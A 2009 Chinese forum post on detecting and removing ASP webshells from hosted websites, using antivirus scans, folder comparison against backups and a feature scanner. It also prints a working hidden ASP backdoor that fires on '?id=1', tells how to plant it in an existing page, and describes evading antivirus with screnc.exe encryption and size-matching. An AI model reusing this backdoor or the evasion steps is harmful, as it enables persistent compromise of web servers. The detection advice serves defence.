下沙论坛

 找回密码
 注册论坛(EC通行证)

用新浪微博连接

一步搞定

QQ登录

QQ登录

下沙大学生网QQ群8(千人群)
群号:6490324 ,验证:下沙大学生网。
用手机发布本地信息严禁群发,各种宣传贴请发表在下沙信息版块有问必答,欢迎提问 提升会员等级,助你宣传
新会员必读 大学生的论坛下沙新生必读下沙币获得方法及使用
查看: 2406|回复: 1
打印 上一主题 下一主题

asp后门、asp木马大清理

[复制链接]
  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    跳转到指定楼层
    1
    发表于 2009-4-17 08:32:46 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
    网上的一些防范asp木马的教程都基于提前防范的基础之上,例如:禁止FSO,利用NTFS限制用户目录等等。这些方法虽然有效,但是都是基于提前防范的,而且对于一般的买空间来做网站的朋友来说显然不可能。我在这里讲讲如何有效的发现web空间中的asp木马并清除。
    3 t3 }3 `& p8 a( A% Y$ u" o3 o9 ~  ~0 {
    通过帮朋友整理web空间摸索出了一些技巧,这些技巧还挺管用,不敢独享,拿出来共享。
    & Z) |, R8 S4 ?" z( h
    * z" M! i; x( n. [3 `一.技巧1:杀毒软件查杀 3 k2 X, p4 a: H9 {  y

    $ ^/ y+ G7 ~  }: C7 U' k2 ]0 d3 g一些朋友可能在成功得到上传权限之后,上传的asp木马是一些非常有名的asp木马,例如:cmdasp,海洋顶端木马,这些木马虽然功能强大,但是早已经被杀毒软件列入了黑名单,所以利用杀毒软件对web空间中的文件进行扫描,可以有效的发现并清除这些有名的asp木马。这是我利用瑞星杀毒软件在web目录中查杀到的一个asp木马,木马标注为:Script.ASP.Rootkit.10.a,在瑞星的网站上搜索一下,可以知道这就是海洋顶端木马。 ' N* j/ [4 D) s2 X% A
    % D7 f( y0 `, M
    利用这种方法,可以有效的对抗一些小菜上传的asp木马,效果明显。
    ' I3 U, X# \( e" T3 t% f+ m: p
    : m- {# b2 v# `- M8 X; ]二.技巧2:FTP客户端对比 % X2 c: C- n6 y
    . L- ~6 g3 F  l1 p
    上面的方法虽然对菜鸟入侵者比较管用,但是遇到稍微有点意识的入侵者来说,几乎失去效果,因为他们完全可以对asp木马进行伪装,加密,使其躲藏杀毒软件,这样的手法比较多,我个人比较喜欢微软开发个的一个asp加密小工具:screnc.exe,screnc.exe是一款ASP加密程序,加密的程式比较安全,使代码完全改变,使用也非常简单。只需要在命令下输入: 8 ?0 V: [# u- b  {0 @8 D% {

    0 h8 J( K$ g% A( ~. S, m5 Sscrenc.exe,得到帮助命令:Usage: screnc [/?] [/f] [/xl] [/l ScriptLanguage] [/e DefaultExtension] 〈source〉 〈destination〉,根据提示,只需要输入:screnc.exe 要加密的asp木马名 输出的asp木马名,就可以完成加密伪装。
    ' P2 k- N$ t  ~: H# I6 e2 K, [4 B/ h8 y& |% ]( r
    经过加密之后,记事本打开查看,可以看到标签:〈% ……%〉,〈script〉〈/script〉
    $ h9 v5 X  {5 l. Y( D# z' I, U0 K# |/ ?
    等标签内的代码成为一些“乱码”,而杀毒软件查杀asp木马是通过搜索关键字来查杀,着阿姨能够显然就躲过查杀。 9 Q, G$ k$ |! T7 |8 p4 Y1 r

    ' \9 r# `' f0 C; N9 s盛大官方网站被黑,挂的网页木马代码就是利用screnc.exe来加密的,过了好几天才被发现,可见加密伪装手法的高超。   P! `: ]4 p2 d9 b2 E; L  B+ G
    ) N1 n. K- W# S' ^
    所以要采取另外的措施对付这种加密伪装的asp木马,我们可以利用一些FTP客户端软件(例如cuteftp,FlashFXP)提供的文件对比功能,通过对比FTP的中的web文件和本地的备份文件,发现是否错出可疑文件。 + J6 Z$ k6 Y6 P+ O' O" T
    . b2 J# {0 ^# k# G& Y' ^& [9 A6 u
    这里以FlashFXP进行操作讲解。 . K+ C/ q) M5 N0 }9 n! a

    - G3 x- _# k) b2 }/ ~/ F步骤1:打开FlashFXP,在左边窗口中跳转到本地web备份文件目录,在右边的FTP窗口中跳转到web目录下。
    " [* ]; o1 C! Q4 \6 M3 _6 t6 T1 C( _8 k/ |" |2 d
    步骤2:点工具栏中的“工具”,选择其中的“比较文件夹命令”,即可进行对比文件夹,速度非常快。 1 k2 V$ S% y' Q1 _, n4 ]1 j1 t
    % M2 ?) A$ e1 L& ^$ n+ _
    我们可以清楚的看到196个对象被过滤,在FTP空间中多出了这样几个asp文件:.asp,2005.asp等,这十有八九就是入侵者留下的asp后门,打开确认一下即可。
    4 s5 B# S- y6 r$ i  o+ W三.技巧3:用Beyond Compare 2进行对比 + w$ j4 V) ~9 o- o- R% X

    0 l* ^- m; J! M0 F; x) l- t& e上面的利用FTP客户端对比文件的方法,虽然有效,但是遇到渗透入文件的asp木马,那就无能为力了,这里介绍一款渗透性asp木马,可以将代码插入到指定web文件中,平常情况下不会显示,只有使用触发语句才能打开asp木马,其隐蔽性非常高。代码如下: " l4 o. ~$ S, h+ ]. e, o

    ' W& W+ F4 v3 \3 |! t〈%
    3 V6 r) l$ A  d$ @* l' y) Y! {# [9 X7 m) o; ]
    on error resume next
    2 M. y! t, d$ d9 L3 x: H  s' i; T1 ^( M" C4 ?* T
    id=request("id")
    ; A: b8 M' ?$ |4 W9 ]" P
    ! P2 N- H0 m1 _( ]% f% O# ~7 I# Lif request("id")=1 then + F. S% g. c( i9 o4 y6 u. u# `

    $ @) W$ T8 Q8 B, n$ s8 wtestfile=Request.form("name") % N9 T" K% ]4 ~$ ^, O

    6 P& C: N$ u: Wmsg=Request.form("message") 6 w5 ^; i7 o/ s$ \8 h
    * C; f( y; \: `$ d/ @# G3 g
    set fs=server.CreatObject("scripting.filesystemobject") : [  w, I5 z0 Q! |1 u
      Q, [1 R; B6 o
    set thisfile=fs.openTestFile(testfile,8,True,0)
    - X$ R) B, {8 _- a  S. R' W; }$ M- \- |9 V  g
    thisfile.Writeline(""&msg&"")
    : k$ z# R6 ]( ~+ E# _5 `9 p6 v9 ~+ S- D8 H! ]6 W' ^; p
    thisfile.close & f( T0 G% s) [( `4 i

    & h8 n# P. C! Xset fs=nothing + Z2 v  {8 {4 m4 l2 k' j  X4 ^1 t

    * i. [! x9 f2 e6 V8 R9 ~%〉 & I8 L. j! p9 {. U! C
    9 ?8 H% u  e: W& P6 O
    〈from method="post" Action="保存"?id=1〉
    ; p+ q$ K: Q3 r( c, r0 z: K) {; B5 \
    $ J7 |* m" F9 L! k4 N〈input type="text" size="20" name="Name"
    . |, Y4 e  \+ g4 A' u8 d. ~2 m1 G0 a7 F0 [) H5 p& }* W2 p0 o
    Value=〈%=server.mappath("XP.ASP")%〉〉 , N9 \6 [- D# a! C! x
    . e# k" L0 }& y; C3 |" B' a, M& v
    〈textarea name="Message" class=input〉   \2 V0 M/ M$ y; z% W" |
    2 M7 u/ L3 g* i1 e/ {9 U# E
    # J' d* u* r" [: z, Y5 W' W! V# @
    〈/textarea〉 $ `8 E+ T& X) N$ \: ~
    . s+ f/ _" n# [: @
    〈input type="Submit" name="send" Value="生成"
      M. t, X5 [, m, ?) W, X/ A
    ; x5 O% C0 p4 }4 y: H5 r$ U0 kclass=input〉
    ' o3 i& Q* K$ |; i' O
      r, r* F- J' ?' a〈/from〉
    * N$ x9 c) c% X9 r& I  l0 @6 l0 s; q  l) B# V8 I1 A
    〈%end if%〉 ! D5 V/ H0 b, P+ v

    / S0 @* h7 ?9 n. e注意:在修改目标主机的web文件时,要注意这样的文件修改后没有效果,即含有类似于:〈!--#include file="inc/conn.asp"--〉这样的文件包含命令,这样的代码存在时,加入asp代码后根本不会显示出脚本后门,但是脚本后门代码不会影响原文件的显示和功能。
    * Z/ {7 s" r; F" u' E9 U# v
    5 M) [6 X: J" i) Q; ^( e8 v假如已经对目标服务器www.target.com下的一个editor_InsertPic.asp文件进行了修改,插入了脚本后门代码,那么打开的方式是:www. target..com/editor_InsertPic.asp?id=1,注意后门的字符?id=1,有了这些字符,才能保证脚本后门显示出来!普通情况下打开www. target..com/editor_InsertPic.asp?id=1,是不会露出破绽的。 ' @6 e7 Q& q# Z, X' ], y$ S

    8 c- d3 t! Y6 ^$ k1 X7 H这招真是asp木马放置中非常狠的,如果遇到这样的情况,该怎么办?我们可以利用一款专业的文件对比工具Beyond Compare 2来完成木马的查找。
    " B( x" H1 P$ x+ V, V$ H2 Z. d' B. {' l) |. Q! k4 `
    Beyond Compare 2一款不可多得的专业级的文件夹和文件对比工具。使用它可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示,查看方便。并且支持多种规则对比。
    1 T8 k6 s+ M) r4 p% z2 S0 z: k
    8 q( X  P# J0 z* C
    看我来利用它完成渗透性asp木马的查找。
    5 A4 R) P! y$ q0 d! f- {- }- |0 R: H' j6 ?' v
    步骤1:打开Beyond Compare 2,点工具栏中的“比较任务”,选择其中的选项:新建,在“比较模式”中选择“比较两个文件夹”。进入一下步,选择需要对比的两个文件夹路径,即备份过的网站文件以及从FTP上下载的网站文件,再在下面的“文件过滤器”中选择“包括所有文件”。在“比较范围”中选择“文件大小”。设置完毕即可开始比较。
    : y3 w9 j% ^$ L* O! X: P) A- ]
    # f  u& h0 p! }% j9 \步骤2:比较完毕,软件界面左右两边分别显示了比较的结果,从中可以很容易找到哪个目录多出了什么文件。
    $ D% M$ o/ @' K  r2 v' g4 m" _- s- r+ q# n8 K
    步骤3:文件名相同,但是大小不同的文件,会被软件用另外的颜色标注出来,选择上它们,然后选择工具栏的“操作”中的“比较内容”功能,即可展开两个文件的详细内容,从中我们可以看到FTP端的文件被插入了渗透asp木马。这下很容易找到了吧!
    / I$ C- A5 r( i8 S, Z/ F3 _0 s" K, c1 X! }3 [# ?

    ; g$ _5 h5 d- u四.技巧4:利用组件性能找asp木马
    6 n5 s" `' D: f; k& j( P. ^. W3 _
    * n0 S1 J: ?7 O4 P1 c上面分门别类的介绍了几种asp木马的放置与查杀技巧,一般的菜鸟,老鸟恐怕都是利用上面的方法来放置asp木马吧!所以可以有效的对抗web空间中上传的asp木马。这下可以高枕无忧了吧?呵呵!先别急,还有一种BT的asp木马放置方法,你可能很难想到,放置思路是这样的:在目标web空间中寻找一个不常用的,比较合适的asp文件,打开它对其进行代码精简,然后再将渗透asp木马的代码插入,再对其进行精简,直至与原本的文件大小一样。最后利用加密伪装的手法对其进行处理。这样就彻底练就了一个绝对隐藏的asp木马后门,一般的入侵者恐怕很难做到这一点,因为要精简代码的同时还要保证asp木马的功能不会错误。
    * ~9 Y! b, Y5 ?6 m3 c. S! k: j, P8 l: Q/ R8 C
    如果你恰恰遇到一个这样的入侵者,那么该怎么才能查出被他放置的asp木马呢?你可能认为这已经不太可能了,呵呵!完全可能,看我拿出宝贝来:思易asp木马追捕。
    $ j  E+ \# y, ]& F, O& e/ h3 R) [8 F. G# @* M& l4 u
    它是一款专门检索各种asp文件所带功能的asp软件,通过搜索asp木马含有的特殊字符,以及搜索利用变量创建对象及静态对象建立的代码,来找出可能含有疑点的asp文件,从而有效的防范asp木马。
    4 K: y, T/ Z# P$ {. n6 {8 ^% f( V" g5 f  [7 ?  |  R7 v0 u
    使用非常简单,只需要将文件asplist2.0.asp上传到web空间下,然后在地址拦中打开,就完成了所有asp文件的检索。可以看出它是通过查找各个asp文件的功能来确认是否为asp木马,这些功能也都是asp木马常用的:FSO,WS,SHELL,XML等等。 % `1 N0 n; {, B% k; d2 T4 d7 H4 c
    * G# R& @, W( D' t$ ^# I3 H/ z0 E
    一般的web文件很少具有这样的功能,只有那些可恶的asp木马才具有,可以看到一些文件具备了相当多的功能,这时候,就可以打开这些文件来确认是否是asp木马,非常有效。
    : h/ b; V7 z4 Z* q) }: r7 m. l2 R. {  t, V0 r! w$ m+ q
    大家在查找web空间的asp木马时,最好几种方法结合起来,这样就能有效的查杀被隐藏起来的asp木马。
    分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
    收藏收藏 分享分享 顶 踩 转发到微博
  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    2
     楼主| 发表于 2009-4-17 13:22:05 | 只看该作者
    回复 支持 反对

    使用道具 举报

    关闭

    下沙大学生网推荐上一条 /1 下一条

    快速回复 返回顶部 返回列表